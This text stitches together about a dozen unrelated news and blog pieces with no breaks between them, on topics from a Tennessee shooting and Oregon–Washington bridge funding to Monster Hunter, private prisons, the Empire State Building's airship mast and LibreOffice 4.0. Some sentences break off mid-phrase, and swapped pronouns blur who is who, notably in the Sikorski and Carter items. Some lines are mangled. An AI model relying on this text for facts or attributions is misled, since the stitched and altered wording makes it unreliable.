A man and woman were shot to death early today and a second woman was wounded in a triple shooting in East Brainerd.
The shooting happened around 6:30 a.m. in the 7400 block of Pinewood Drive, according to police.
The condition of the woman who survived the early morning shooting was not immediately available.
About 1 p.m., while waiting for a comment from police, a reporter witnessed bystanders begin to scream at each other, with one yelling, "He has a gun."
One man jumped off of a porch and pushed another person.
Onlookers took cover, and some ran into a nearby church. Patrolman Curtis Morris, pictured, pulled out their semi-automatic weapon.
No shots were fired.
Earlier, Police took an elderly woman who was in tears and another middle age couple up to the house along with the owner of the house.
Police have not released the victims' names or ages. Police have no suspect information at this time.
A fourth person was shot on Cannon Avenue in an unrelated incident.
Stay with the Times Free Press for updates on this developing story.
A fight broke out near the scene of a triple shooting in East Brainerd. People took cover in a ditch as police pulled out semi-automatic weapons. Photo by Steve Johnson /Times Free Press.
Bystanders move to take cover in a nearby church as a fight breaks out at the scene of a triple shooting in East Brainerd. Photo by Steve Johnson /Times Free Press.
This story was updated Sept. 6 at 10:15 p.m. to clarify that the officer's weapon was semi-automatic. Stay with the Times Free Press as more information becomes available.
View full size
Oregon and Washington will enter 2013, the year construction is supposed to begin on the
with no firm plan on how to raise their $900 million share of the cost.
After seven years and $140 million worth of planning, engineering and politicking, the massive I-5 bridge and freeway expansion was humbled in the recently concluded session of the Washington Legislature, emerging with exactly zero dollars.
The continued uncertainty this late in the game stems in part from the sheer size and price of the CRC and a tepid economic recovery. But there are also more basic forces at work.
Americans are driving less, in such numbers that it is shaking the financial foundation of transportation departments from Oregon to Oklahoma. Less driving means less gas consumed means less gas tax revenue.
Both the Oregon and Washington departments of transportation also face years of significant debt payments after an unprecedented borrowing spree over the last decade. The departments now resemble a lot of Americans post-recession: Short on income, mired in debt and facing an expensive future.
Not the ideal position from which to extract another $900 million for a controversial freeway project.
"We've got a problem, a serious problem," said Paula Hammond, director of the
. "We didn't really get much out of this Legislature. But everyone recognizes the needs are not going away."
THE DEATH OF CRUISING
For decades cruisers were a downtown fixture. Thousands of rowdy youngsters, in the family beater or daddy's Beamer, converged on Southwest Broadway for a vast, mobile party. Around 2000, the scene just sort of petered out.
"That's all kind of in the past now," said Portland police officer Eric Schober, chuckling at the problem from a bygone age. "It seems like we've had a whole lifestyle change."
Indeed, after six decades of seemingly inexorable increases, traffic peaked nationally in 2004. The total vehicle miles have been flat or down each year since. In 2011, the average American drove 6 percent fewer miles than in 2004.
Peak traffic came earlier and the decline has been longer in Oregon. The 19.7 billion miles Oregonians drove in 2010 was a stunning 1.2 billion miles less than the peak in 2002.
In Portland, the average driver now travels 19.1 miles a day, 20 percent less than nationwide.
Commuters waging a daily battle through the area's many choke points may sneer at the notion of a significant reduction in driving. But the numbers are compelling.
With the economy slowly mending, Oregon officials hoped driving would rebound in 2011. Instead, it declined to 19.1 billion miles, the lowest level since 1996.
"We see the trend continuing," said Matt Garrett, director of ODOT.
The reasons are in large part financial. High gas prices and the recession have made driving less affordable. But the declines predate the recession and have continued after it.
David Levinson, a University of Minnesota professor who studies transportation issues, argues that the trend is long-term and is as much cultural as financial.
Teens, historically the most avid drivers, are waiting longer to get their licenses and are driving less, pushed by higher costs and also tougher rules for young drivers, stronger enforcement of drunk driving laws, even technology. Another theory: smart phones and the Internet have supplanted the car as a central platform of young people's social lives.
Cars themselves have also changed. Some don't burn a drop of gas or pay a penny in gas taxes. Others use less, due in part to tougher federal mileage standards. "It's official government policy to drive down gas tax revenue," Levinson said.
Garrett points out driving reductions haven't alleviated the chronic congestion on the existing I-5 bridges over the Columbia River. Population growth will make it even worse. Congestion has become an obstacle to freight haulers as well as a safety issue, which makes the CRC a necessity, they said.
one of the project's most persistent and convincing critics, disagrees.
"This project was designed for a future that we know will never come to pass," Cortright said. "The DOTs' world-view is stuck in a place where gas costs a buck a gallon, and people drive more and more every year. For better or worse, that's not the world we're living in any more."
As Cortright points out, tolling will likely lead to dramatic further reductions. The Glenn Jackson Bridge on I-205 will offer a tempting, untolled alternative.
The
on Lake Washington in Seattle has a similar alternative route in the I-90 bridge. Traffic on the 520 has dwindled 35 to 40 percent since the state began tolling late last year.
GAS TAXES DECLINE
As driving declines, so too does the financial firepower of the states' respective transportation departments.
Oregon's gas tax revenue generated $392.5 million in the 2001 fiscal year. By decade's end, the number was $393.6 million.
Only when Oregon instituted a 6 cent-per-gallon gas tax increase in 2011did the revenue grow, finishing the 2011 fiscal year at $412.3 million.
Washington's gas tax revenue has been more volatile, but only because it increased the tax twice during the decade. Thanks to the 14.5 cent-per-gallon increase, Washington's gas tax revenue jumped from more than $760 million in 2001 to $1.25 billion in 2011.
Oregon's gas tax is now a 30-cent per gallon tax. Washington charges 37.5 cents.
It will take more gas tax hikes to significantly grow that revenue as gasoline consumption declines in both states.
Oregonians burned 1.64 billion gallons of gas and diesel in 2011, the lowest since 2001. Diesel usage actually grew over most of the decade, which ODOT officials attribute to a strong commercial trucking sector. Gasoline consumption, meanwhile, nose-dived to 1.48 billion gallons in 2011, despite the halting economic recovery. Oregonians haven't used that little gas since 1994.
Washingtonians, meanwhile, burned 3.35 billion gallons in 2011, the lowest number since 2002.
Both states' departments have multiple sources of funds, including licensing and registration fees. But the gas tax remains the single largest revenue source. With that flat to down for the foreseeable future, it severely limits options.
"Revenue is going in the wrong direction but the costs just go up," ODOT's Garrett said.
Compounding the dilemma is their decision during the last decade to borrow billions of dollars to fund hundreds of key road and bridge improvements. But now it's time to pay the piper.
ODOT's total debt has soared from $58.3 million in 2001 to $2.2 billion a decade later. Correspondingly, the annual debt service has gone from $3.6 million to $148.6 million.
WSDOT's debt hit $5.7 billion by 2011. Its annual debt service tripled during the decade to $346.1 million by 2011. By 2015, it will be paying out $522.5 million annually to investors, 62.3 percent of its annual gas tax revenue.
"It's like those folks who built a really big house during the boom," said WSDOT's Hammond. "They are really loving the house, but now they've got to pay the mortgage."
MONKEY-WRENCH IN THE PLAN
More
According to the CRC's master plan, the first step into the breach on funding was to take place in January in Olympia.
The
would approve a small gas tax hike sufficient to generate the state's $450 million share of the $3.1 billion price tag. Then, as required by Washington law, the tax increase would have gone to voters in November.
The thumbs-up from the Legislature was vital. It would be the all-important signal of local buy-in hat the federal government required before it would open its own piggy bank.
Counting on anything from Washington, D.C. these days -- let alone more than $1 billion -- is risky given the level of financial and partisan chaos in the Capital. But if the CRC were to be a contender at the federal level, it needed to show that the locals had their act together.
But the CRC quickly got lost as Washington Legislators were met with a $1 billion budget gap and a fusillade of grave needs.
The Legislature debated a sales tax hike for education and a new fee on each barrel of oil for road maintenance.
The CRC gas tax was a political non-starter.
"We were talking about going to the ballot for things like education and human services," said Washington Rep. Judy Clibborn, D-Mercer Island. "The possibility of getting a gas tax on top of that seemed miniscule."
After the session's end in March, the CRC tried hard to look for a bright side, pointing out that lawmakers had passed a bill authorizing tolling. But in terms of actual funding, it got zilch.
Now the onus shifts to Oregon.
Garrett and Patricia McCaig, Gov. Kitzhaber's liaison to the CRC, are meeting with Oregon's legislative leaders to hammer out a proposal that will be unveiled in Salem at the opening of the 2013 session in January.
Possibilities include a small -- 1 to 1.5 cent per gallon -- gas tax hikes and increased registration and title fees. The CRC needs Oregon to come up with $35 million in new revenue. The state could then leverage that money with yet another bond sale and raise Oregon's share of $450 million.
Winning a new tax in this economic and political climate promises to be "a heavy lift," as the CRC's political strategists like to say.
But some key voices in the Legislature are supportive.
"There are a lot of reasons it's a good time," said Rep. Tobias Read, D-Beaverton, vice chair of the House Transportation and Economic Development Committee. "It would be good for the economy, interest rates are low and it would help us maintain our place in line (for federal money.)"
On the other hand, the CRC must show lawmakers it is on top of its game. It can't afford another embarrassing gaffe like the surprise in March that the U.S. Coast Guard may not sign off on the current 95-foot bridge design because it would impede certain upstream users of the shipping channel.
"I will confess that the Coast Guard's reaction did not make me happy," Read said.
Capcom hopes the release of Monster Hunter 3 Ultimate next month will see the series finally crack the west.
The game launches at the same time on the Wii U and 3DS, and features cross-platform play, shared saving as well as online play on Wii U.
While Monster Hunter enjoys phenomenal popularity in Japan, it remains a niche game with a cult following in the west. It's sold a whopping 22 million copies globally, but most of these are to Japanese gamers.
Executives at the Japanese company have spoken about the reasons for this before: in Japan players gather in public places, such as train stations, to connect over local wi-fi to hunt monsters together. In the west this doesn't happen. Instead, online play fuels co-operative gaming.
And Monster Hunter has proved most successful on the PlayStation Portable - a console that has sold wonderfully well in Sony's homeland but struggled somewhat in the west.
Now, Monster Hunter 3 Ultimate (a remake of Monster Hunter Tri) on Wii U features online play, and players can transfer their 3DS saves to the Wii U version so they can continue their game at home after playing on Nintendo's handheld while out and about. There's also a Monster Hunter 3 Ultimate Wii U and 3DS bundle set for release.
It's all part of a concerted, deliberate effort on the part of Capcom to grow Monster Hunter's popularity in the west.
"You're right in terms of us intentionally doing this," Monster Hunter producer Ryozo Tsujimoto told Eurogamer. "It's always been our wish to make a good start and we've always been saying we'll do this at one point.
With Wii U, which is online compatible, and with 3DS with its portability, releasing both of them together, we're giving opportunity and options to consumers to really pick up the version they want and the one that suits them Monster Hunter producer Ryozo Tsujimoto
"Monster Hunter in Japan started and developed in a very different way to how it's been in Europe so far, Japan being a rather densely populated place with a quite prominent culture of visiting each other's places to play games together. You see kids carrying their consoles taking them to their friends. They already had this basis of playing games through local network, whereas it's a bit more difficult in the US and Europe where your neighbour is seven miles away.
"With Wii U, which is online compatible, and with 3DS with its portability, releasing both of them together, we're giving opportunity and options to consumers to really pick up the version they want and the one that suits them.
"By doing that we might be able to actually have a breakthrough. That's definitely our intention."
The western release of Monster Hunter 3 Ultimate on Wii U comes three months after it released in Japan. While not ideal, this is a stark improvement over previous localisation efforts (the 3DS version, the ninth Monster Hunter game released in eight years, launched in December 2011).
"We're well aware of the complaints from the fans about the time difference of releases," Tsujimoto said. "We have been trying our best to try to reduce it.
"So this time, with great help from Nintendo, we've managed to greatly shorten the delay in release and at the same time we're releasing it for both platforms, which is an achievement in a sense. So hopefully we can implement a more systematic way of doing this in the future."
This time, with great help from Nintendo, we've managed to greatly shorten the delay in release and at the same time we're releasing it for both platforms, which is an achievement in a sense
With Monster Hunter's popularity in Japan almost a given, you'd be forgiven for thinking Capcom would focus on western gamers and change significantly the Monster Hunter experience to appeal to western tastes.
But, bar slight but important gameplay tweaks (better camera control being chief among them), Monster Hunter has remained largely the same over its nine year history.
"We've got a very clear vision of what a Monster Hunter game is," Tsujimoto said. "If we were to change the game system and what we believe is Monster Hunter to something else, then we don't have to name it Monster Hunter. We would just call it something else.
"In order for it to be Monster Hunter we are obliged to keep the essence of Monster Hunter, but at the same time make some innovations so it doesn't stagnate.
"We don't want to betray the existing fans for the sake of getting new people in. Rather than changing the game itself, we want to expand the way it can be played, for instance, releasing it on Nintendo 3DS and Wii U."
One aspect of Monster Hunter some have complained over the years is its sometimes brutal difficulty, but Tsujimoto refuses to budge on this.
"At the end of the day, Monster Hunter is an action game," they said. "It's got to be challenging. It's got to be solid in that sense. Not to the extent that it's heartbreaking. But it's got to have significant points to it.
"You have a breakthrough. You hit a wall. You ponder for a bit. And then you break through again. There are significant steps where you are satisfied in each, but it's never heartbreaking. It's a matter of balance in that sense."
For Monster Hunter 3 Ultimate Capcom added a target camera, an auto-lock system that fans have long called for. But the development team only approved its inclusion after deciding it didn't harm the overall experience.
At the end of the day, the Monster Hunter difficulty is in the action element, not the camera control. We don't want people to be hindered because the camera control is awkward
"At the end of the day, the Monster Hunter difficulty is in the action element, not the camera control. We don't want people to be hindered because the camera control is awkward. We wanted to provide a comfortable environment for the players without spoiling the solidness of the game itself."
Tsujimoto said the target camera should "smooth" the learning curve for newcomers to the series.
In Japan, Monster Hunter 4 launches in the summer of this year exclusively on the Nintendo 3DS. Given Capcom's renewed effort to reduce the delay between release in Japan and the west, will we see the game launch on these shores any time soon?
"Of course we're doing our best to deliver Monster Hunter 3 Ultimate in perfect condition right now," Tsujimoto answered, "and we're looking forward to as many people as possible picking up the game.
"Obviously, the more people who pick this game up will definitely encourage the whole Monster Hunter scene worldwide. So, Monster Hunter 3 Ultimate 3 everyone!
"Monster Hunter 3 Ultimate is an amazing game. We've put so much effort into it. It's my baby. So before you talk about my next baby, I'd like you to love my first baby."
The Supreme Court ruled last week, in a 5-4 decision along the usual conservative/liberal lines, that evidence collected by police due to police mistakes can be used against defendants.
The decision came in a case in which police mistakenly arrested a man named Bennie Herring of Alabama. During the arrest, they found methamphetamine and an empty gun in their car. It turned out, however, that the arrest warrant that the officers used to arrest Herring had been revoked months before. The police's database had mistakenly not been updated to reflect the change.
I'm not a legal scholar, but I don't think that the decision is a good one for America. In all societies, there is a balance between government power and individual rights. In dictatorships the pendulum swings very far towards the government; in libertarian governments the pendulum swings in the opposite direction.
In our democracy we have prided ourselves in always trying to let the pendulum swing a bit more towards the individual rights side. Some of the proudest moments in our history have been when groups of individuals have won victories against the forces that would limit them. I'm thinking specifically of the Civil War; Teddy Roosevelt's wars against the giant trusts in the early 20th century; FDR's victory over entrenched interests during the Great Depression; and the Civil Rights movement of the 1950s and 60s.
I'm not trying to argue that I think Bennie Herring is an innocent victim. In fact, I'd say that under normal circumstances they probably deserve to go to jail. But I'd also say just as emphatically that he, and everyone else, deserves the protection of the law—even if they are a very imperfect citizen.
Rules limiting police power are not intended to allow people to get away with crimes; they're intended to ensure that police do not abuse their already substantial power over individual citizens. The Constitution doesn't only limit government; it protects citizens. Because the police didn't follow the rules in Bennie Herring's case, even if their mistake was unintentional, they should not be allowed to use the tainted evidence against him.
The balance between government power and individual rights is a delicate one, and it is constantly shifting based on popular opinions and legislative changes. Too many times in the past decade we have allowed the balance to shift too far towards government. Bennie Herring's case is one example.
As Americans we pride ourselves on individual rights. Let's make sure going forward that we do our best not to let the government have any more power than it needs to keep us free.
Via the Huffington Post:
Recent college graduates trying to make it on their own have truly been living through a lost decade. Young college graduates are making less money than they made in 2000, according to a new analysis by the Economic Policy Institute. Those working full-time for the entire year made roughly $3,200 less in 2012 than they made in 2000, when adjusted for inflation. The Economic Policy Institute analyzed the wages of 21- to 24-year-old college graduates who are not in school and don't have an advanced degree. At least they're lucky enough to have a job. The unemployment rate for recent bachelor's degree recipients was 13.5 percent in October of 2011, according to a recent report by the Labor Department. That is triple the unemployment rate for college graduates age 25 and older at the time.
At first I was like wow that's awful, but it's adjusted for inflation, so not as awful. I am one of these people who fall into this ambiguous category, and not gonna lie it could be easier. But in some senses, who cares. We live in America. We can drink water. We don't need the third sushi roll. More motivation to #makeit. More motivation to ultimately be let down. Being compromised by the golden handcuffs is its own form of slavery, anyway. Society, man. Least we're not morally bankrupt*, amirite?
*Your moral bank account is not actually inversely related to your actual one. I was just trying to make us feel a little better. But seriously, capitalism. Outdo people and stuff. Put hashtags in front of words like grind. Screw others over. Overlook balconies and question whether or not you're doing the right thing. It's all part of the game.
[H/T: Huffington Post]
“
In this photo provided by the Manitoba Government, former President Jimmy Carter drinks while helping build homes for Habitat for Humanity in Winnipeg, Manitoba on Thursday. Carter was treated for dehydration while volunteering with Habitat for Humanity. | AP Photo Jimmy Carter collapses from dehydration, receives medical attention
Former President Jimmy Carter collapsed on Thursday from dehydration on a Habitat for Humanity construction site in Winnipeg, Canada.
Carter subsequently received medical attention once an ambulance was called and EMTs came to their side on scene. The former president was then taken to a local hospital as a precautionary measure, but was said to be recovering.
Story Continued Below
"He encourages everyone to stay hydrated and keep building," a spokesperson for Habitat for Humanity said in a statement.
At 92, Carter has been a long-time supporter of Habitat for Humanity, frequently dedicating their efforts to hands-on work along with philanthropy. The last time Carter was in Winnipeg, in 1993, was for another Habitat for Humanity construction project for 18 other homes.
A guard escorts an immigrant detainee back into the general population at the Adelanto Detention Facility in Adelanto, Calif., which is managed by GEO Group. (John Moore/Getty Images)
In recent years, the private prison company GEO Group has held its annual leadership conference at venues near its Boca Raton headquarters. But this year, the company moved its gathering to a Miami-area golf resort owned by President Trump.
The event last week, during which executives and wardens gathered for four days of meetings, dinner receptions and golf outings at the luxurious 800-acre Trump National Doral, followed an intense effort by GEO Group to align itself with the president and their administration.
During last year's election, a company subsidiary gave $225,000 to a pro-Trump super PAC. GEO gave an additional $250,000 to the president's inaugural committee. It also hired as outside lobbyists a major Trump fundraiser and two former aides to Attorney General Jeff Sessions, one of the president's most prominent campaign backers.
GEO Group, meanwhile, has had newfound success in Trump's Washington.
The company secured the administration's first contract for an immigration detention center, a deal worth tens of millions a year. And its stock price has tripled since hitting a low last year when the Obama administration sought to phase out the use of private prisons — a decision that Sessions reversed.
GEO Group's achievements over the past year show how a company that has long relied heavily on doing business with the government — and whose business model was under threat — is thriving in the Trump era.
Even as the president has targeted lobbyists and Washington special interests with their vow to "drain the swamp," GEO Group has regained its footing while escalating its spending on traditional tactics such as lobbying and campaign donations. The Doral event represents a potential avenue of influence that is unique to Trump: the chance for a corporation to engage in a private business transaction with the president.
"It is the opposite of draining the swamp," said Carl Takei, a senior staff lawyer at the American Civil Liberties Union's National Prison Project.
GEO Group did not answer questions from The Washington Post about its stepped-up political activity, nor would the company say when it booked the Doral conference or how much it paid the president's resort.
The Post was able to identify only one other event that GEO had at Doral in recent years: a shareholder meeting in 2007, about five years before Trump purchased the property.
"Over the years, we have held company and employee meetings at a variety of venues around the country, and as a Florida-based company, we have held meetings throughout the state, including at Doral," GEO Group said in a statement.
The company also sought to play down its influence in shaping the administration's agenda. "We do not take a position on, or advocate for or against, criminal justice, sentencing, immigration enforcement or detention policies," the statement said. "Our political and lobbying activities focus on promoting the benefits of public-private partnerships."
A White House official said the administration had no knowledge of the Doral event. The Trump Organization did not respond to requests for comment.
[Trump's divisive presidency reshapes a key part of their private business]
GEO Group, which owns or manages about 140 prisons, immigration-detention centers and other facilities nationwide and derives nearly half of its revenue from federal contracts, entered the Trump era with a great deal at stake. In the past 10 years, the federal government has paid GEO Group and its subsidiaries more than $4 billion, according to federal contracting records.
The company suffered a setback when, in the summer of 2016, then-Deputy Attorney General Sally Yates ordered the Justice Department to phase out its use of private prisons. Yates's move came after a Justice Department inspector general's report called the facilities less secure than those run by the government.
The Federal Bureau of Prisons slashed thousands of beds from potential prison deals that were up for a federal award.
In a statement to The Post, GEO criticized the inspector general's findings and said the data shows that "privately run facilities are at least as equally safe, secure, and humane as publicly run facilities."
Alex Friedmann, who is an associate director with the Human Rights Defense Center, a prisoner advocacy group, and an activist shareholder in GEO Group, said the company has worked to amass political influence because public contracts are its lifeblood.
"They have to lobby and curry political favor because that's what their business model is based on," they said.
In the 2016 election cycle, GEO stepped up its contributions, with its employee-financed political action committee giving federal candidates, PACs and parties about $732,000 — more than four times as much as in the previous presidential cycle, according to federal filings. Of the amount contributed directly to congressional candidates in the last cycle, 87 percent went to Republicans, according to a breakdown by the Center for Responsive Politics.
GEO's chief rival in the private prison industry, Nashville-based CoreCivic, gave less than half as much in corporate PAC donations in the 2016 cycle, and the company says it has never held an event at a Trump property.
Jonathan Burns, a spokesperson for CoreCivic, declined to specifically comment on GEO Group's activities but said that their company's history "clearly shows that we engage with individuals from across the political spectrum and at all levels of government."
Early in the presidential race, Trump made clear that they supported the use of private prisons. "I do think we can do a lot of privatizations and private prisons. It seems to work a lot better," they said during a televised town hall gathering in March 2016.
Their Democratic rival, Hillary Clinton, had the opposite view, saying in a September debate, "You shouldn't have a profit motivation to fill prison cells with young Americans."
A subsidiary of GEO Group contributed $225,000 to the pro-Trump super PAC Rebuilding America Now — including $125,000 about a week before the election, according to campaign finance reports.
The watchdog group Campaign Legal Center filed a complaint with the Federal Election Commission about the contributions, arguing that they violated a long-standing ban on donations by federal contractors.
GEO has said that because its subsidiary, GEO Corrections Holdings, made the donation, the ban does not apply. The complaint is pending before the FEC.
GEO has brought on new lobbyists in the past year, hiring two former Sessions aides, David Stewart and Ryan Robichaux, as well as Brian Ballard, who represented the Trump Organization in Florida and raised money for their campaign.
Stewart and Robichaux did not respond to requests for comment. Ballard told The Post that they are unable to comment on matters concerning their clients.
George Zoley, GEO Group's founder and chief executive, is a prominent Republican donor in Florida.
Lanny Davis, a Washington consultant who previously represented GEO Group, said the company's donations and lobbying were not aimed at bolstering its influence over policymakers. Rather, Davis said, Zoley is simply "a Republican and they liked Trump."
A month into the Trump administration, Sessions issued a memo reversing Yates's decision. They said the phaseout plan impaired the Bureau of Prisons' "ability to meet the future needs of the federal correctional system."
Sessions had in the past voiced support for the use of contract facilities, saying in a 2010 congressional hearing that they believed "there is a role for private prisons in the American system."
GEO Group did not answer questions about whether it lobbied Sessions to reverse the policy.
The company has already secured significant business with the federal government this year.
In April, it won the Trump administration's first immigration detention contract, a 10-year deal first proposed during President Barack Obama's term to build and run a 1,000-bed facility in Conroe, Tex. GEO has said the project is expected to generate $44 million a year.
The company also has renewed contracts for Bureau of Prisons facilities such as the Big Spring complex in Texas, where GEO has said it expects about $664 million in combined revenue over a 10-year term.
Justice Department spokesperson Ian Prior said the Bureau of Prisons requires a competitive-bidding process for its contract awards and "does not give preference to any company or organization."
Zoley, who did not respond to requests for comment, told investment analysts in August that the company thinks "there are a number of significant opportunities to deploy our assets over the next year." They added, "We remain optimistic about the demand for our diversified services and our continued growth potential."
In bringing its annual conference last week to Doral, GEO was doing business with one of the signature properties in Trump's real estate empire.
Although Trump no longer manages their private company, ethics experts have said their decision to retain ownership has created the potential for corporations and other interests with business before the federal government to gain influence by bolstering the president's personal fortune.
The golf resort, which Trump bought in 2012 and extensively renovated, is the single biggest contributor to Trump's cash flow, according to Trump's June financial disclosure filing, generating $116 million in revenue between January 2016 and March 2017.
Large events can generate hundreds of thousands of dollars in revenue for the resort. The Republican Governors Association, which held a donor summit at Doral this spring, paid the resort more than $408,000 for its two-day event, tax filings show. A spokesperson said the event was planned in early 2015.
The same week of the GEO meeting, Doral hosted events by two other large companies — L3 Technologies and Siemens Healthineers — that have major government contracts. An L3 spokesperson said the event was unrelated to the current administration, while Siemens did not respond to requests for comment.
One evening during GEO's conference, dozens of wardens and executives were shuttled by charter bus to a nearby Latin bar for a performance by Zoley, who plays guitar in a rock band.
Just past 9:30 p.m., scores of GEO employees who were packed into the bar's patio began cheering as the band launched into a cover of Tom Petty's "I Won't Back Down."
Harwell reported from Washington. Anu Narayanswamy, Matt Zapotosky, Jack Gillum and Alice Crites in Washington contributed to this report.
July 2000 The photograph on the left evokes a Golden Age of air travel. Dirigibles would cross the Atlantic, then appear over Manhattan and glide up to the Empire State Building. After a dirigible docked at the world's tallest building, passengers would transfer from airship to skyscraper, and an elevator would whisk them to street level. Through it all, New Yorkers would be treated to the behemoth hovering overhead. The only problem is that the photo is a fake. The artful composite illustrates nothing more than the wishful thinking of financier John. J. Raskob and former New York governor Al Smith, the pair that spearheaded the creation of the Empire State Building in the late 1920s. Previously,the building was to top out at the 85th floor, with a flat roof. But the story goes that Raskob looked at a scale model one day and declared, "It needs a hat." After all, the rival Chrysler Building was crowned with a distinctive stainless steel spire. Unadorned, the Empire State project would reach higher than the Chrysler, but only by few feet. The addition conceived by Raskob's team would add another 200 feet-and it would serve more than a mere ornamental function. It would become a unique airport in the sky. With legendary showmanship, Al Smith extolled the building taking shape, including its airship-docking role. The press chimed in with talk of "a sensational new era in the history of aviation." By opening day, May 1,1931, the masonry structure sported a cylindrical mooring mast, done up in chrome-nickel steel and faceted glass. The Empire State Building was completed on time and under budget. Yet for such a well-thought-out building, it was remarkably unprepared for its role as aviation pioneer. Granted, the building's framework was stiffened against the 50-ton pull of a moored dirigible, some of the winch equipment for pulling in arriving ships was installed, and the 86th floor was readied with space for a departure lounge and customs ticket offices. The builder's lawyers even prepared a thick brief, arguing, amongst other things, that owners of neighboring buildings could not sustain a claim of trespass when they found dirigibles overhead. But no one worked out one other problem: wind. The steel-and-glass canyons of Manhattan are an airship captain's nightmare of shifting air currents. Raskob and Smith were inviting the unwieldy craft to come in low and slow, over hazards such as the menacing Chrysler Building spire, and somehow tie up without use of a ground crew. Then, too, if the crew released ballast to maintain pitch control, a torrent of water would cascade onto the streets below. And once secured, a dirigible could be tethered only at the nose, with no ground lines to keep it steady. Passengers would have to make their way down a stinging gangway, nearly a quarter mile in the air, onto a narrow open walkway near the top of the mast. After squeezing through a tight door, they would have to descend two steep ladders inside the mast before reaching the elevators. "Can you see some of the 75-year-old dowager doing that?" asks Alexander Smirnoff, the current telecommunications director of the building, as they stand on that walkway. Confronted with such daunting realities, Smith dispensed bland assurances that "there must be some way to work that thing out." They insisted that the US Navy was a partner in the project and its dirigible Los Angeles would dock at the mast. But the navy remained mum. The most it did was allow one of its smaller airships to hover nearby one day at the request of a newsreel company. Passenger airship service was the province of Germany's Zeppelin Company, and its head, Hugo Eckener, did not hide their skepticism. That's fortunate for New York. Just imagine if the hydrogen-filled Hindenburg had exploded over midtown Manhattan instead of Lakehurst, New Jersey. Eventually, the press' initial enthusiasm for the docking scheme began giving way to concerns about risk. A Philadelphia newspaper wrote, "Basically the proposal to dock transatlantic airships...hangs on the highly dubious contention that the saving of an hour's time to thirty or forty travelers is of more importance than the assured safety of thousands of citizens on the streets below." One small airship did drop a a long rope to the mast and held on from a distance for a precarious three minutes, and another delivered a bundle of newspapers by rope. After that, the effort was quietly abandoned. But the mast remained, and it eventually became an asset, turning out to be a spectacular radio and television transmitter. It also provided two popular and lucrative observation decks. And it gave the Empire State Building an unforgettable profile. Finally, the mast became an enduring symbol of human folly. John Tauranac, author of The Empire State Building: The Making of a Landmark, called the airship plan "the looniest building scheme since the Tower of Babel." -Lester A. Reingold
Air & Space Smithsoniian, July 2000
— The Atlanta Hawks' Mike Budenholzer and the Portland Trail Blazers' Terry Stotts today were named the NBA Eastern and Western Conference Coaches of the Month, respectively, for games played in December.
Budenholzer led the Hawks to the best record in the NBA in December, 14-2 (.875). Atlanta won seven consecutive games to open the month, part of an overall nine-game winning streak which dated back to Nov. 28. Following a one-point loss to the Orlando Magic on Dec. 13, the Hawks reeled off a five-game winning streak from Dec. 15-23, which included wins over the Chicago Bulls, Cleveland Cavaliers, Dallas Mavericks, Houston Rockets and Los Angeles Clippers. Atlanta posted identical 7-1 marks at home and on the road during December.
Stotts guided the Trail Blazers to the Western Conference's best record in December, 13-3 (.813). Portland recorded three winning streaks of four-or-more games on the month, including a stretch with five consecutive wins from Dec. 13-20, during which all but one win came by double digits. The Trail Blazers, who rank in the top three in the NBA in opponents points per game allowed, surrendered 100-plus points just five times in 16 December contests. The Trail Blazers played three overtime games during December, and won them all.
Other nominees for Coach of the Month were Chicago's Tom Thibodeau, Dallas' Rick Carlisle, Golden State's Steve Kerr, Los Angeles Clippers' Doc Rivers, Milwaukee's Jason Kidd, Oklahoma City's Scott Brooks, Toronto's Dwane Casey, and Washington's Randy Wittman.
A month after receiving a shocking homophobic message in a valentine at their former workplace, Degas Sikorski is feeling the love all the way from Parliament Hill.
Sikorski was presented with a Valentine's Day card and photo from Edmonton-Centre MP Randy Boissonault during a brunch on Saturday. In photos posted on Facebook the same day, the card features a photo of a rose and inside are messages of support from MPs, and Prime Minister Justin Trudeau.
"Dear Degas, know that your friends outnumber the haters by the millions and I'm one of those friends," Trudeau wrote.
Sikorski instantly welled up when they first opened the card and laid their eyes on the two photos, one of Trudeau and Boissonault signing the card and the other of the Prime Minister showing it off.
"It was hard not to cry at the moment when I saw that somebody who I see as above me and almost godly in my eyes, as you're taught in high school, is giving me a personal message," said Sikorski.
"It just took all the words out of my mouth."​
Boissonault said Sikorski was "speechless" at the gesture.
"Then the tears started to fall, then we asked them how they felt," Boissonault said. "He said 'I feel totally loved and I want to give the prime minister a hug.'"
The card came with a green booklet, embossed with the House of Commons stamp and filled with more messages from MPs.
"You are amazing! We all support you!" Wrote Chrystia Freeland, Minister of International Trade.
Sikorski garnered massive support last month after their mother, Shelley Bramhoff Sikorski, posted a photo on Facebook of the valentine they received from Party City, where they were employed at the time.
It's important for people in positions of authority to stick up and remind people what is right. - Randy Boissonault , Member of Parliament
The valentine was a paper plate filled with candy and covered with hearts. Written in black marker on the front was their son's name and a homophobic message.
In a Facebook message, Sikorski said their son, Degas, received the valentine from someone at their workplace, Party City, in north Edmonton. They had been an employee at the store for three years, while putting themselves through university, they wrote.
They have since left their job there.
'We have their back'
Boissonault, an openly gay MP, said they knew they wanted to do something to help Sikorski after seeing the original posting on Facebook. Boissonault said they faced some "tough times" being gay in Alberta during the 1990s and said it's important for people of any age to know Canada is tolerant of anyone's sexual orientation.
They decided to get a Valentine's Day card and asked their colleagues in the House of Commons to sign it.
"I explained what was going on to the prime minister and they said, 'well, that doesn't sound very nice, let's write this young man a message.' So we went into their office and they signed a beautiful message to Degas," they said.
On Saturday, two and a half weeks later, Boissonault finally gave Sikorski the card.
"It's important for people in positions of authority to stick up and remind people what is right," said Boissonault. "Here (we are) reaching out to say that we have their back. And bullying like that, and anti-LGBTQ sentiments, are just not tolerated."
Sikorski, for one, never thought what happened to them would ever land itself on the Prime Minister's radar.
"I never thought it would get to the prime minister, I never thought they would even care," said Sikoski.
"I knew equality and LGBTQ issues were a thing for Justin Trudeau, I just didn't think that an issue that I experienced myself would be so close to home for him."
LibreOffice 4.0, the first release of the open-source office suite said to truly reflect the project's objectives, has hit the web.
LibreOffice was forked from the OpenOffice code-base back in 2010 with the aim of speeding up development, adding new features, and improving interoperability with other office apps (read: Microsoft Office).
“LibreOffice 4.0 is a milestone in interoperability and an excellent foundation for our continued work to improve the User Interface,” says Florian Effenberger, Chairman of the Board of Directors at The Document Foundation – the hands steering the project.
All of the new features and fixes are listed in detail on the official website.
But, for those of you with more pressing things to do than read the minutiae of a change-log, here is a quick overview of the more notable new additions…
New In LibreOffice 4.0
LibreOffice (or ‘Lurching-Into-Life-Office as I call it) has a reputation for being a bit slow when loading and saving various document types. This release puts the kibosh on that nickname with serious speed gains when working with large ODS and XLSX spreadsheets and RTF files.
For Ubuntu users this release finally brings support for Unity's App Menu baked in. No more extra plugins or packages.
